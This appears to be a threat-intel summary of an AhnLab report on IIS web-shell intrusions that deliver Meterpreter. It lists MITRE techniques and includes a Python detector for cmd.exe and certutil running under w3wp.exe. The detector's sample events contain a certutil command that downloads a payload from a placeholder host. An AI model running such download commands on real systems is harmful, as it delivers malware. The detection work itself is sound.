Threat actors leverage search engines like Shodan to discover externally exposed targets and plan initial access to services such as IIS. AhnLab EDR discusses detection and response for such attempts, highlighting behaviors like web shells and the Meterpreter backdoor. #AhnLabEDR #IIS #WebShell #Meterpreter #Shodan #MeshAgent #MSQL #Redis
Key points
- Threat actors use Shodan and similar tools to identify vulnerable external targets for initial access.
- IIS web servers with vulnerable versions are targeted, with attackers installing web shells or executing malicious commands.
- The Meterpreter backdoor can be downloaded via standard Windows utilities (cmd and certutil) and executed through the web server process.
- Logs show detection of command shell activity (cmd) and certutil usage tied to a web shell scenario.
- AhnLab EDR emphasizes attack surface management and patching to prevent exposure of assets like IIS, MS-SQL, Redis, and MeshAgent.
- The article highlights EDR capabilities for continuous monitoring, analysis, and threat hunting to respond to initial access events.
MITRE Techniques
- [T1046] Network Service Scanning: Threat actors identify targets using search engines like Shodan; "Threat actors can use these search engines to engage in malicious behaviors such as collecting information on attack targets or performing port scanning attacks against any devices."
- [T1190] Exploit Public-Facing Application: When a web server with a vulnerable version is identified, they exploit a vulnerability appropriate for the version to install web shells or execute malicious commands. "When a web server with a vulnerable version is identified, they exploit a vulnerability appropriate for the version to install web shells or execute malicious commands."
- [T1105] Ingress Tool Transfer: The Meterpreter backdoor was downloaded through normal Windows utilities (cmd and certutil). "Meterpreter backdoor was downloaded through normal Windows utilities (cmd and certutil)."
- [T1059.003] Windows Command Shell: cmd.exe was launched by the w3wp.exe process. "cmd.exe was launched by the w3wp.exe process."
- [T1505.003] Web Shell: The Meterpreter backdoor was executed via a web shell. "Meterpreter backdoor was executed via a web shell since cmd.exe was launched by the w3wp.exe process."
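The detection logic the summary describes (cmd.exe and certutil spawned under the IIS worker process w3wp.exe) can be expressed as a parent-chain check over process-creation telemetry. The following is an added example, not code from AhnLab or the ASEC post; the event schema and the sample events are constructed, and the technique labels are the ones listed above.

```python
# Added example (not part of the ASEC summary): flag process-creation events
# where cmd.exe or certutil.exe run under the IIS worker process w3wp.exe,
# the parent/child relationship the page attributes to web shell activity.
from dataclasses import dataclass

# Suspicious child images mapped to the MITRE techniques named in the summary.
SUSPICIOUS_CHILDREN = {
    "cmd.exe": "T1059.003 Windows Command Shell",
    "certutil.exe": "T1105 Ingress Tool Transfer",
}
IIS_WORKER = "w3wp.exe"


@dataclass(frozen=True)
class ProcEvent:          # assumed minimal process-creation record
    pid: int
    ppid: int
    image: str            # base name of the executable
    cmdline: str


def find_web_shell_chains(events):
    """Return (technique, event) pairs for cmd.exe / certutil.exe whose
    ancestry includes w3wp.exe. The ppid chain is walked upward, so a
    certutil.exe launched from a w3wp.exe-spawned cmd.exe is also caught."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for ev in events:
        technique = SUSPICIOUS_CHILDREN.get(ev.image.lower())
        if technique is None:
            continue
        ancestor = by_pid.get(ev.ppid)
        for _ in range(16):       # bounded walk guards against pid-reuse cycles
            if ancestor is None:
                break
            if ancestor.image.lower() == IIS_WORKER:
                hits.append((technique, ev))
                break
            ancestor = by_pid.get(ancestor.ppid)
    return hits


# Constructed sample telemetry (not real logs): an IIS worker, a cmd.exe it
# spawned, a certutil download from that shell, and an unrelated admin shell.
SAMPLE_EVENTS = [
    ProcEvent(100, 4, "svchost.exe", "svchost.exe -k iissvcs"),
    ProcEvent(200, 100, "w3wp.exe", "w3wp.exe -ap DefaultAppPool"),
    ProcEvent(300, 200, "cmd.exe", "cmd.exe /c certutil -urlcache -f http://placeholder.invalid/p.bin p.bin"),
    ProcEvent(400, 300, "certutil.exe", "certutil -urlcache -f http://placeholder.invalid/p.bin p.bin"),
    ProcEvent(500, 4, "cmd.exe", "cmd.exe"),
]

if __name__ == "__main__":
    for technique, ev in find_web_shell_chains(SAMPLE_EVENTS):
        print(f"[{technique}] pid={ev.pid} image={ev.image} cmdline={ev.cmdline}")
```

Running it reports the w3wp.exe-descended cmd.exe and certutil.exe events and ignores the cmd.exe that has no IIS ancestor.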
Indicators of Compromise
- [Process] context: cmd.exe, w3wp.exe, and certutil usage observed in web shell activity and Meterpreter deployment
Read more: https://asec.ahnlab.com/en/65390/